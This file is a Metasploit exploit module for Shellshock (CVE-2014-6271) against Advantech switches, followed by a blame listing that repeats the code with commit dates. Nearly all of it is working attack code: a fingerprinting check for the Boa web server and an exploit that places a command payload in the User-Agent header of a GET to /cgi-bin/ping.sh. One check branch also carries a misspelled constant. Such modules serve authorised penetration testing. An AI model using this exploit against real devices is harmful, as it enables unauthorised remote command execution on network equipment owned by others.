modules/exploits/linux/http/advantech_switch_bash_env_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
        'Description' => %q{
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
          handles external environment variables. This module targets the 'ping.sh' CGI
          script, accessible through the Boa web server on Advantech switches. This module
          was tested against firmware version 1322_D1.98.
        },
        'Author' => 'hdm',
        'References' => [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities' ],
          [ 'URL', 'https://access.redhat.com/articles/1200223' ],
          [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ]
        ],
        'Privileged' => false,
        'Arch' => ARCH_CMD,
        'Platform' => 'unix',
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00\x0A\x0D",
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'openssl generic'
                        }
        },
        'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
        'DefaultTarget' => 0,
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2015-12-01',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => [],
          'AKA' => ['Shellshock']
        }
      )
    )
    register_options([
      Opt::RPORT(80)
    ])
  end

  #
  # CVE-2014-6271
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end

  #
  # Check credentials
  #
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/cgi-bin/ping.sh'
    )
    if !res
      vprint_error("No response from host")
      return Exploit::CheckCode::Unknown
    elsif res.headers['Server'] =~ /Boa\/(.*)/
      vprint_status("Found Boa version #{$1}")
    else
      print_status("Target is not a Boa web server")
      return Exploit::CheckCode::Safe
    end

    if res.body.to_s.index('127.0.0.1 ping statistics')
      return Exploit::CheckCode::Detected
    else
      vprint_error("Target does not appear to be an Advantech switch")
      return Expoit::CheckCode::Safe
    end
  end

  #
  # Exploit
  #
  def exploit
    cmd = cve_2014_6271(payload.encoded)
    vprint_status("Trying to run command '#{cmd}'")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/cgi-bin/ping.sh',
      'agent' => cmd
    )
  end
end
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`Rank = ExcellentRanking`
			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',`
			`'Description' => %q{`
			`This module exploits the Shellshock vulnerability, a flaw in how the Bash shell`
			`handles external environment variables. This module targets the 'ping.sh' CGI`
			`script, accessible through the Boa web server on Advantech switches. This module`
			`was tested against firmware version 1322_D1.98.`
			`},`
			`'Author' => 'hdm',`
			`'References' => [`
			`[ 'CVE', '2014-6271' ],`
			`[ 'CWE', '94' ],`
			`[ 'OSVDB', '112004' ],`
			`[ 'EDB', '34765' ],`
			`[ 'URL', 'https://www.rapid7.com/blog/post/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities' ],`
			`[ 'URL', 'https://access.redhat.com/articles/1200223' ],`
			`[ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ]`
			`],`
			`'Privileged' => false,`
			`'Arch' => ARCH_CMD,`
			`'Platform' => 'unix',`
			`'Payload' => {`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`'Space' => 1024,`
			`'BadChars' => "\x00\x0A\x0D",`
			`'DisableNops' => true,`
			`'Compat' =>`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'openssl generic'`
			`}`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],`
			`'DefaultTarget' => 0,`
			`'License' => MSF_LICENSE,`
			`'DisclosureDate' => '2015-12-01',`
			`'Notes' => {`
			`'Stability' => [CRASH_SAFE],`
			`'SideEffects' => [],`
			`'Reliability' => [],`
			`'AKA' => ['Shellshock']`
			`}`
			`)`
			`)`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`register_options([`
Remove the SSL option (not needed) 2015-12-01 11:34:03 -06:00			`Opt::RPORT(80)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`end`

			`#`
			`# CVE-2014-6271`
			`#`
			`def cve_2014_6271(cmd)`
			`%{() { :;}; $(#{cmd}) & }`
			`end`

			`#`
			`# Check credentials`
			`#`
			`def check`
			`res = send_request_cgi(`
			`'method' => 'GET',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => '/cgi-bin/ping.sh'`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`)`
			`if !res`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_error("No response from host")`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`return Exploit::CheckCode::Unknown`
			`elsif res.headers['Server'] =~ /Boa\/(.*)/`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_status("Found Boa version #{$1}")`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`else`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Target is not a Boa web server")`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`return Exploit::CheckCode::Safe`
			`end`

			`if res.body.to_s.index('127.0.0.1 ping statistics')`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`return Exploit::CheckCode::Detected`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`else`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_error("Target does not appear to be an Advantech switch")`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`return Expoit::CheckCode::Safe`
			`end`
			`end`

			`#`
			`# Exploit`
			`#`
			`def exploit`
Typo and switch from raw -> encoded 2015-12-01 10:59:12 -06:00			`cmd = cve_2014_6271(payload.encoded)`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_status("Trying to run command '#{cmd}'")`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`res = send_request_cgi(`
			`'method' => 'GET',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => '/cgi-bin/ping.sh',`
			`'agent' => cmd`
Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00			`)`
			`end`
			`end`